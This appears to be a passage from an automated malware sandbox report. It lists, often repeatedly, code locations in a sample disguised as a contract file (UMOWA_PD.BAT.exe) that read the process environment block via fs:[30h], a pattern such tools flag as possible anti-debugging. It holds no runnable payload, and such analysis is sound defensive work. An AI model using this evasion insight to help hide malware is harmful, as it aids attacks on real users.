        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3F0A5 mov eax, dword ptr fs:[00000030h]2_2_33D3F0A5
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4B0AF mov eax, dword ptr fs:[00000030h]2_2_33D4B0AF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC0044 mov eax, dword ptr fs:[00000030h]2_2_33CC0044
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6505B mov eax, dword ptr fs:[00000030h]2_2_33D6505B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91051 mov eax, dword ptr fs:[00000030h]2_2_33C91051
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C91051 mov eax, dword ptr fs:[00000030h]2_2_33C91051
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97072 mov eax, dword ptr fs:[00000030h]2_2_33C97072
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C96074 mov eax, dword ptr fs:[00000030h]2_2_33C96074
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C96074 mov eax, dword ptr fs:[00000030h]2_2_33C96074
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C98009 mov eax, dword ptr fs:[00000030h]2_2_33C98009
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB5004 mov eax, dword ptr fs:[00000030h]2_2_33CB5004
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB5004 mov ecx, dword ptr fs:[00000030h]2_2_33CB5004
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D02D mov eax, dword ptr fs:[00000030h]2_2_33C8D02D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F7CF mov eax, dword ptr fs:[00000030h]2_2_33D4F7CF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBE7E0 mov eax, dword ptr fs:[00000030h]2_2_33CBE7E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C937E4 mov eax, dword ptr fs:[00000030h]2_2_33C937E4
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C977F9 mov eax, dword ptr fs:[00000030h]2_2_33C977F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C977F9 mov eax, dword ptr fs:[00000030h]2_2_33C977F9
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E79D mov eax, dword ptr fs:[00000030h]2_2_33D0E79D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B781 mov eax, dword ptr fs:[00000030h]2_2_33D6B781
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B781 mov eax, dword ptr fs:[00000030h]2_2_33D6B781
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC1796 mov eax, dword ptr fs:[00000030h]2_2_33CC1796
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC1796 mov eax, dword ptr fs:[00000030h]2_2_33CC1796
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D617BC mov eax, dword ptr fs:[00000030h]2_2_33D617BC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C907A7 mov eax, dword ptr fs:[00000030h]2_2_33C907A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5D7A7 mov eax, dword ptr fs:[00000030h]2_2_33D5D7A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5D7A7 mov eax, dword ptr fs:[00000030h]2_2_33D5D7A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5D7A7 mov eax, dword ptr fs:[00000030h]2_2_33D5D7A7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3E750 mov eax, dword ptr fs:[00000030h]2_2_33D3E750
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC174A mov eax, dword ptr fs:[00000030h]2_2_33CC174A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC3740 mov eax, dword ptr fs:[00000030h]2_2_33CC3740
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F75B mov eax, dword ptr fs:[00000030h]2_2_33C8F75B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB2755 mov eax, dword ptr fs:[00000030h]2_2_33CB2755
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB2755 mov eax, dword ptr fs:[00000030h]2_2_33CB2755
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB2755 mov eax, dword ptr fs:[00000030h]2_2_33CB2755
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB2755 mov ecx, dword ptr fs:[00000030h]2_2_33CB2755
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB2755 mov eax, dword ptr fs:[00000030h]2_2_33CB2755
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB2755 mov eax, dword ptr fs:[00000030h]2_2_33CB2755
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA2760 mov ecx, dword ptr fs:[00000030h]2_2_33CA2760
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 mov eax, dword ptr fs:[00000030h]2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 mov eax, dword ptr fs:[00000030h]2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 mov eax, dword ptr fs:[00000030h]2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 mov eax, dword ptr fs:[00000030h]2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 mov eax, dword ptr fs:[00000030h]2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD1763 mov eax, dword ptr fs:[00000030h]2_2_33CD1763
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94779 mov eax, dword ptr fs:[00000030h]2_2_33C94779
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C94779 mov eax, dword ptr fs:[00000030h]2_2_33C94779
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC0774 mov eax, dword ptr fs:[00000030h]2_2_33CC0774
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F717 mov eax, dword ptr fs:[00000030h]2_2_33D4F717
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB270D mov eax, dword ptr fs:[00000030h]2_2_33CB270D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB270D mov eax, dword ptr fs:[00000030h]2_2_33CB270D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB270D mov eax, dword ptr fs:[00000030h]2_2_33CB270D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9D700 mov ecx, dword ptr fs:[00000030h]2_2_33C9D700
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B705 mov eax, dword ptr fs:[00000030h]2_2_33C8B705
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B705 mov eax, dword ptr fs:[00000030h]2_2_33C8B705
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B705 mov eax, dword ptr fs:[00000030h]2_2_33C8B705
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8B705 mov eax, dword ptr fs:[00000030h]2_2_33C8B705
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9471B mov eax, dword ptr fs:[00000030h]2_2_33C9471B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9471B mov eax, dword ptr fs:[00000030h]2_2_33C9471B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5970B mov eax, dword ptr fs:[00000030h]2_2_33D5970B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5970B mov eax, dword ptr fs:[00000030h]2_2_33D5970B
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB9723 mov eax, dword ptr fs:[00000030h]2_2_33CB9723
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C93722 mov eax, dword ptr fs:[00000030h]2_2_33C93722
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C93722 mov eax, dword ptr fs:[00000030h]2_2_33C93722
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C906CF mov eax, dword ptr fs:[00000030h]2_2_33C906CF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5A6C0 mov eax, dword ptr fs:[00000030h]2_2_33D5A6C0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBD6D0 mov eax, dword ptr fs:[00000030h]2_2_33CBD6D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0C6F2 mov eax, dword ptr fs:[00000030h]2_2_33D0C6F2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0C6F2 mov eax, dword ptr fs:[00000030h]2_2_33D0C6F2
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C896E0 mov eax, dword ptr fs:[00000030h]2_2_33C896E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C896E0 mov eax, dword ptr fs:[00000030h]2_2_33C896E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9C6E0 mov eax, dword ptr fs:[00000030h]2_2_33C9C6E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C956E0 mov eax, dword ptr fs:[00000030h]2_2_33C956E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C956E0 mov eax, dword ptr fs:[00000030h]2_2_33C956E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C956E0 mov eax, dword ptr fs:[00000030h]2_2_33C956E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB66E0 mov eax, dword ptr fs:[00000030h]2_2_33CB66E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CB66E0 mov eax, dword ptr fs:[00000030h]2_2_33CB66E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1C691 mov eax, dword ptr fs:[00000030h]2_2_33D1C691
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA0680 mov eax, dword ptr fs:[00000030h]2_2_33CA0680
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0D69D mov eax, dword ptr fs:[00000030h]2_2_33D0D69D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F68C mov eax, dword ptr fs:[00000030h]2_2_33D4F68C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C98690 mov eax, dword ptr fs:[00000030h]2_2_33C98690
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D586A8 mov eax, dword ptr fs:[00000030h]2_2_33D586A8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D586A8 mov eax, dword ptr fs:[00000030h]2_2_33D586A8
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D64A mov eax, dword ptr fs:[00000030h]2_2_33C8D64A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8D64A mov eax, dword ptr fs:[00000030h]2_2_33C8D64A
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C93640 mov eax, dword ptr fs:[00000030h]2_2_33C93640
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF640 mov eax, dword ptr fs:[00000030h]2_2_33CAF640
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF640 mov eax, dword ptr fs:[00000030h]2_2_33CAF640
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAF640 mov eax, dword ptr fs:[00000030h]2_2_33CAF640
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCC640 mov eax, dword ptr fs:[00000030h]2_2_33CCC640
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCC640 mov eax, dword ptr fs:[00000030h]2_2_33CCC640
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC265C mov eax, dword ptr fs:[00000030h]2_2_33CC265C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC265C mov ecx, dword ptr fs:[00000030h]2_2_33CC265C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC265C mov eax, dword ptr fs:[00000030h]2_2_33CC265C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC5654 mov eax, dword ptr fs:[00000030h]2_2_33CC5654
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC666D mov esi, dword ptr fs:[00000030h]2_2_33CC666D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC666D mov eax, dword ptr fs:[00000030h]2_2_33CC666D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC666D mov eax, dword ptr fs:[00000030h]2_2_33CC666D
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA3660 mov eax, dword ptr fs:[00000030h]2_2_33CA3660
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA3660 mov eax, dword ptr fs:[00000030h]2_2_33CA3660
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CA3660 mov eax, dword ptr fs:[00000030h]2_2_33CA3660
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C87662 mov eax, dword ptr fs:[00000030h]2_2_33C87662
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C87662 mov eax, dword ptr fs:[00000030h]2_2_33C87662
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C87662 mov eax, dword ptr fs:[00000030h]2_2_33C87662
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C90670 mov eax, dword ptr fs:[00000030h]2_2_33C90670
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2670 mov eax, dword ptr fs:[00000030h]2_2_33CD2670
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CD2670 mov eax, dword ptr fs:[00000030h]2_2_33CD2670
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC360F mov eax, dword ptr fs:[00000030h]2_2_33CC360F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBD600 mov eax, dword ptr fs:[00000030h]2_2_33CBD600
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CBD600 mov eax, dword ptr fs:[00000030h]2_2_33CBD600
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F607 mov eax, dword ptr fs:[00000030h]2_2_33D4F607
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D64600 mov eax, dword ptr fs:[00000030h]2_2_33D64600
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D23608 mov eax, dword ptr fs:[00000030h]2_2_33D23608
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D23608 mov eax, dword ptr fs:[00000030h]2_2_33D23608
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D23608 mov eax, dword ptr fs:[00000030h]2_2_33D23608
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D23608 mov eax, dword ptr fs:[00000030h]2_2_33D23608
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D23608 mov eax, dword ptr fs:[00000030h]2_2_33D23608
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D23608 mov eax, dword ptr fs:[00000030h]2_2_33D23608
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D18633 mov esi, dword ptr fs:[00000030h]2_2_33D18633
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D18633 mov eax, dword ptr fs:[00000030h]2_2_33D18633
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D18633 mov eax, dword ptr fs:[00000030h]2_2_33D18633
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C97623 mov eax, dword ptr fs:[00000030h]2_2_33C97623
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C95622 mov eax, dword ptr fs:[00000030h]2_2_33C95622
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C95622 mov eax, dword ptr fs:[00000030h]2_2_33C95622
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C90630 mov eax, dword ptr fs:[00000030h]2_2_33C90630
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC0630 mov eax, dword ptr fs:[00000030h]2_2_33CC0630
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3D62C mov ecx, dword ptr fs:[00000030h]2_2_33D3D62C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3D62C mov ecx, dword ptr fs:[00000030h]2_2_33D3D62C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D3D62C mov eax, dword ptr fs:[00000030h]2_2_33D3D62C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C8F5C7 mov eax, dword ptr fs:[00000030h]2_2_33C8F5C7
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC65D0 mov eax, dword ptr fs:[00000030h]2_2_33CC65D0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC15EF mov eax, dword ptr fs:[00000030h]2_2_33CC15EF
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B5E0 mov eax, dword ptr fs:[00000030h]2_2_33C9B5E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B5E0 mov eax, dword ptr fs:[00000030h]2_2_33C9B5E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B5E0 mov eax, dword ptr fs:[00000030h]2_2_33C9B5E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B5E0 mov eax, dword ptr fs:[00000030h]2_2_33C9B5E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B5E0 mov eax, dword ptr fs:[00000030h]2_2_33C9B5E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9B5E0 mov eax, dword ptr fs:[00000030h]2_2_33C9B5E0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D1C5FC mov eax, dword ptr fs:[00000030h]2_2_33D1C5FC
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D4F582 mov eax, dword ptr fs:[00000030h]2_2_33D4F582
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E588 mov eax, dword ptr fs:[00000030h]2_2_33D0E588
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D0E588 mov eax, dword ptr fs:[00000030h]2_2_33D0E588
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC2594 mov eax, dword ptr fs:[00000030h]2_2_33CC2594
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C945B0 mov eax, dword ptr fs:[00000030h]2_2_33C945B0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C945B0 mov eax, dword ptr fs:[00000030h]2_2_33C945B0
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D185AA mov eax, dword ptr fs:[00000030h]2_2_33D185AA
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33C9254C mov eax, dword ptr fs:[00000030h]2_2_33C9254C
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D5A553 mov eax, dword ptr fs:[00000030h]2_2_33D5A553
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B55F mov eax, dword ptr fs:[00000030h]2_2_33D6B55F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33D6B55F mov eax, dword ptr fs:[00000030h]2_2_33D6B55F
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CC6540 mov eax, dword ptr fs:[00000030h]2_2_33CC6540
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAE547 mov eax, dword ptr fs:[00000030h]2_2_33CAE547
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CAC560 mov eax, dword ptr fs:[00000030h]2_2_33CAC560
        Source: C:\Users\user\Desktop\UMOWA_PD.BAT.exeCode function: 2_2_33CCC50D mov eax, dword ptr fs:[00000030h]2_2_33CCC50D
